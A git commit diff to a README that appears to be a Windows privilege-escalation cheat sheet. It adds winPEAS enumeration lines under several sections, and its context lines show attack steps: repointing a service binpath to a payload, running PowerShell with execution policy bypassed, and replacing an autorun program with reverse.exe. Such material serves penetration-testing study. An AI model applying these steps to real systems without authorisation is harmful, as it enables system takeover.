Update README.md
This commit is contained in:
Joe Totes
22
README.md
22
README.md
@@ -730,15 +730,13 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
|
|||||||
##### Services
|
##### Services
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
# Enumeration
|
|
||||||
.\winPEASany.exe quiet servicesinfo
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
#########################################################################
|
#########################################################################
|
||||||
#### 1. Insecure Service Properties #####################################
|
#### 1. Insecure Service Properties #####################################
|
||||||
#########################################################################
|
#########################################################################
|
||||||
|
|
||||||
|
# Winpeas Enumeration
|
||||||
|
.\winPEASany.exe quiet servicesinfo
|
||||||
|
|
||||||
# Verify permissions of a service using accesschk
|
# Verify permissions of a service using accesschk
|
||||||
.\accesschk.exe /accepteula -uwcqv user {SERVICE}
|
.\accesschk.exe /accepteula -uwcqv user {SERVICE}
|
||||||
|
|
||||||
@@ -754,11 +752,13 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\""
|
|||||||
# Start a service:
|
# Start a service:
|
||||||
net start {SERVICE}
|
net start {SERVICE}
|
||||||
|
|
||||||
|
|
||||||
#########################################################################
|
#########################################################################
|
||||||
##### 2. Unquoted Service Path ##########################################
|
##### 2. Unquoted Service Path ##########################################
|
||||||
#########################################################################
|
#########################################################################
|
||||||
|
|
||||||
|
# Winpeas Enumeration
|
||||||
|
.\winPEASany.exe quiet servicesinfo
|
||||||
|
|
||||||
# Verify permissions of to start service using accesschk
|
# Verify permissions of to start service using accesschk
|
||||||
.\accesschk.exe /accepteula -uwcqv user {SERVICE}
|
.\accesschk.exe /accepteula -uwcqv user {SERVICE}
|
||||||
|
|
||||||
@@ -777,6 +777,9 @@ net start {SERVICE}
|
|||||||
#### 3. Weak Registry Permissions #######################################
|
#### 3. Weak Registry Permissions #######################################
|
||||||
#########################################################################
|
#########################################################################
|
||||||
|
|
||||||
|
# Winpeas Enumeration
|
||||||
|
.\winPEASany.exe quiet servicesinfo
|
||||||
|
|
||||||
# Check regsvc for weak entries using powershell
|
# Check regsvc for weak entries using powershell
|
||||||
powershell -exec bypass
|
powershell -exec bypass
|
||||||
|
|
||||||
@@ -802,6 +805,9 @@ net start regsvc
|
|||||||
##### 4. Insecure Service Executables (File Permissions: Everyone) ######
|
##### 4. Insecure Service Executables (File Permissions: Everyone) ######
|
||||||
#########################################################################
|
#########################################################################
|
||||||
|
|
||||||
|
# Winpeas Enumeration
|
||||||
|
.\winPEASany.exe quiet servicesinfo
|
||||||
|
|
||||||
# Verify permissions of a service using accesschk
|
# Verify permissions of a service using accesschk
|
||||||
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
|
.\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
|
||||||
|
|
||||||
@@ -818,6 +824,9 @@ net start filepermsvc
|
|||||||
#### 5. DLL Hijacking ###################################################
|
#### 5. DLL Hijacking ###################################################
|
||||||
#########################################################################
|
#########################################################################
|
||||||
|
|
||||||
|
# Winpeas Enumeration
|
||||||
|
.\winPEASany.exe quiet servicesinfo
|
||||||
|
|
||||||
# Verify permissions of to start service using accesschk
|
# Verify permissions of to start service using accesschk
|
||||||
.\accesschk.exe /accepteula -uvqc dllsvc
|
.\accesschk.exe /accepteula -uvqc dllsvc
|
||||||
|
|
||||||
@@ -873,7 +882,6 @@ copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
|||||||
#### 2. AlwaysInstallElevated ###########################################
|
#### 2. AlwaysInstallElevated ###########################################
|
||||||
#########################################################################
|
#########################################################################
|
||||||
|
|
||||||
|
|
||||||
# Winpeas Enumeration to see if both registry values are set
|
# Winpeas Enumeration to see if both registry values are set
|
||||||
.\winPEASany.exe quiet windowscreds
|
.\winPEASany.exe quiet windowscreds
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user